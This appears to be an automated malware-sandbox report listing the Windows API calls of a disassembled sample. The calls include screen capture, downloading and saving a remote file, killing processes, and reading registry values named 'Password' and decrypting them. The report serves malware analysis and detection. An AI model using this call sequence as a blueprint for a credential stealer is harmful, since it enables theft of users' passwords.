                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: f4e58455b7067d020805d3087ad706ebc95aab18d8b5667d2d6dc99188e26670
                          • Instruction ID: 77a1d3a6bb1741298f9252d508b03a82e87590f3ca3d07e134d126d2bce03331
                          • Opcode Fuzzy Hash: f4e58455b7067d020805d3087ad706ebc95aab18d8b5667d2d6dc99188e26670
                          • Instruction Fuzzy Hash: EE61B475E122599BDB12EFB6CD49AAE7BF8EF19300F048165E841E7342D73C99038B90
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,007F0CF0), ref: 007F4276
                          • GetDesktopWindow.USER32 ref: 007F4280
                          • GetWindowRect.USER32(00000000,?), ref: 007F428D
                          • SelectObject.GDI32(00000000,00000000), ref: 007F42BF
                          • GetHGlobalFromStream.COMBASE(007F0CF0,?), ref: 007F4336
                          • GlobalLock.KERNEL32(?), ref: 007F4340
                          • GlobalSize.KERNEL32(?), ref: 007F434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 69f32d39ebd93029db71f4eccf88a93a3dcbc414cbf3ad8f8f1634b58ef9896a
                          • Instruction ID: e69f39944708731c2b9034465aacba84a35ded5d3a3a5d405fd601704fd9169c
                          • Opcode Fuzzy Hash: 69f32d39ebd93029db71f4eccf88a93a3dcbc414cbf3ad8f8f1634b58ef9896a
                          • Instruction Fuzzy Hash: 1C510D75A1021DAFDB10DFE4DD89AAEB7B9EF88300F104519F905A3251DB78AD078BA0
                          APIs
                          • lstrcat.KERNEL32(?,0125E2B0), ref: 007EE00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EE037
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE07D
                          • lstrcat.KERNEL32(?,?), ref: 007EE098
                          • lstrcat.KERNEL32(?,?), ref: 007EE0AC
                          • lstrcat.KERNEL32(?,0124B9C8), ref: 007EE0C0
                          • lstrcat.KERNEL32(?,?), ref: 007EE0D4
                          • lstrcat.KERNEL32(?,0125DD90), ref: 007EE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: 81ebaca30788278f9c705bda6bed7275b3e6535694473e5486389fb9313461fb
                          • Instruction ID: 89d436531d07dedd48711a1b8caf2a758338d4126cfc484ebeb6fc74de781538
                          • Opcode Fuzzy Hash: 81ebaca30788278f9c705bda6bed7275b3e6535694473e5486389fb9313461fb
                          • Instruction Fuzzy Hash: 8D61707191111CDBCB65DBA4CC48BDE77B4BF9C300F1089A5AA49A3351DB749F868F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6AFF
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D6B2C
                          • StrCmpCA.SHLWAPI(?,0125EB38), ref: 007D6B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 007D6B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007D6B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007D6BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007D6BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007D6BF0
                          • CloseHandle.KERNEL32(00000000), ref: 007D6C10
                          • InternetCloseHandle.WININET(00000000), ref: 007D6C17
                          • InternetCloseHandle.WININET(?), ref: 007D6C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 941a828d5b3d2c5546bf228fec6c6b2d54f87be9db7872ab59009e83b2811022
                          • Instruction ID: de1efec85ac07efecbf7c27c2eff563ed656ddeec7d65c38b2119a3dc5cbf962
                          • Opcode Fuzzy Hash: 941a828d5b3d2c5546bf228fec6c6b2d54f87be9db7872ab59009e83b2811022
                          • Instruction Fuzzy Hash: 1541B7B1600219ABDB20DFA4DC49FAE77B8EF44700F104556FA05E7281DF78AD42CBA8
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,007E4F39), ref: 007F4545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F454C
                          • wsprintfW.USER32 ref: 007F455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007F45CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007F45D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 007F45E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9O~$%hs$9O~
                          • API String ID: 885711575-3956251589
                          • Opcode ID: 3f050f7c3889cc7413a77f7727033df78cb699e1b90d5fbe4a1eaf653e55c78a
                          • Instruction ID: 45d2db968a809a998ddde9aa2efc1733db71b6eca7a3d678208c62a0e5117561
                          • Opcode Fuzzy Hash: 3f050f7c3889cc7413a77f7727033df78cb699e1b90d5fbe4a1eaf653e55c78a
                          • Instruction Fuzzy Hash: EF315071A00209BBDB10DBE4DC49FEF7778EF44700F104055FA05E7280EB78AA428BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DBC1F
                          • lstrlen.KERNEL32(00000000), ref: 007DBC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DBC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DBC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DBCAC
                          • lstrlen.KERNEL32(00804AD4), ref: 007DBD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 27b7c5ef331784db1d18947ca9b8f73705469f9a9c11e39a8a151cd37ae2657a
                          • Instruction ID: 3f654e8e5026efd843feb56fccfb6af319dcdeecb70a2dd303e9ac03cdfcbe39
                          • Opcode Fuzzy Hash: 27b7c5ef331784db1d18947ca9b8f73705469f9a9c11e39a8a151cd37ae2657a
                          • Instruction Fuzzy Hash: 6DA15D70A11209CFCB25DFA4D949A6EB7B5EF54304F19816AE809EB362DB39DC43CB50
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 007F6014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 007F609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F60D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 1c0c05b086b1098429a4722d6d08eb5a7093af944de1106c9187a480f1e85bae
                          • Instruction ID: 8ae6a936fd5f02579a9c01caf8b520afc648fa5e49cc5dae53d093d3bdd90b31
                          • Opcode Fuzzy Hash: 1c0c05b086b1098429a4722d6d08eb5a7093af944de1106c9187a480f1e85bae
                          • Instruction Fuzzy Hash: 59616E70710508EBDB18CF5CC894D7EB7B6EB85304B344A59E6928B782EB39ED808795
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE07D
                          • lstrcat.KERNEL32(?,?), ref: 007EE098
                          • lstrcat.KERNEL32(?,?), ref: 007EE0AC
                          • lstrcat.KERNEL32(?,0124B9C8), ref: 007EE0C0
                          • lstrcat.KERNEL32(?,?), ref: 007EE0D4
                          • lstrcat.KERNEL32(?,0125DD90), ref: 007EE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 326d46441e26587350afe09bd8c3b08a0303af73af4104faed84ca110fc3c1ad
                          • Instruction ID: ce7e0582f06039981ba409785ef884c82ac67a92e3af3a200dd15bf816b14043
                          • Opcode Fuzzy Hash: 326d46441e26587350afe09bd8c3b08a0303af73af4104faed84ca110fc3c1ad
                          • Instruction Fuzzy Hash: 82415F7191112CDBCB25EB64DC49ADE73B4BF5C300F1089A5B94AA3252DB789F878F90
                          APIs
                            • Part of subcall function 007D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007D7805
                            • Part of subcall function 007D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007D784A
                            • Part of subcall function 007D77D0: StrStrA.SHLWAPI(?,Password), ref: 007D78B8
                            • Part of subcall function 007D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007D78EC
                            • Part of subcall function 007D77D0: HeapFree.KERNEL32(00000000), ref: 007D78F3
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007D7A90
                          • lstrcat.KERNEL32(00000000,?), ref: 007D7ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 007D7ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 007D7AF0
                          • wsprintfA.USER32 ref: 007D7B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D7B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D7B47
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007D7B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: b764657e7981e532e569133b780a9b319e0d4cefc63dc11f04424947fbc75a10
                          • Instruction ID: bdb2388083a06d790b6a82ac080926ebf6202862363a43dd12a67aea142d4caa
                          • Opcode Fuzzy Hash: b764657e7981e532e569133b780a9b319e0d4cefc63dc11f04424947fbc75a10
                          • Instruction Fuzzy Hash: 4E3198B2A04218EFCB14DFA8DC449AFB779FB88710B14451AE58693351EB78ED43CB64
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8243
                          • lstrlen.KERNEL32(00000000), ref: 007E8260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8297
                          • lstrlen.KERNEL32(00000000), ref: 007E82B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E82EB
                          • lstrlen.KERNEL32(00000000), ref: 007E8308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8337
                          • lstrlen.KERNEL32(00000000), ref: 007E8351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8380
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 3928e18b67c6ecc433472a855da0cb234ae123a4f677ef33ede2368cde4791bc
                          • Instruction ID: eeb5beb765190bd7f3123398db37a351592f6ab758f2b4ec9bae3da458b94ba4
                          • Opcode Fuzzy Hash: 3928e18b67c6ecc433472a855da0cb234ae123a4f677ef33ede2368cde4791bc
                          • Instruction Fuzzy Hash: 85519E70602612DBDB50DF79D858A6EB7B8EF48700F104514AD0AEB345DB38ED52CBE1
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007D7805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007D784A
                          • StrStrA.SHLWAPI(?,Password), ref: 007D78B8
                            • Part of subcall function 007D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 007D775E
                            • Part of subcall function 007D7750: RtlAllocateHeap.NTDLL(00000000), ref: 007D7765
                            • Part of subcall function 007D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007D778D
                            • Part of subcall function 007D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007D77AD
                            • Part of subcall function 007D7750: LocalFree.KERNEL32(?), ref: 007D77B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007D78EC
                          • HeapFree.KERNEL32(00000000), ref: 007D78F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 007D7A35
                          Strings
                          Memory Dump Source
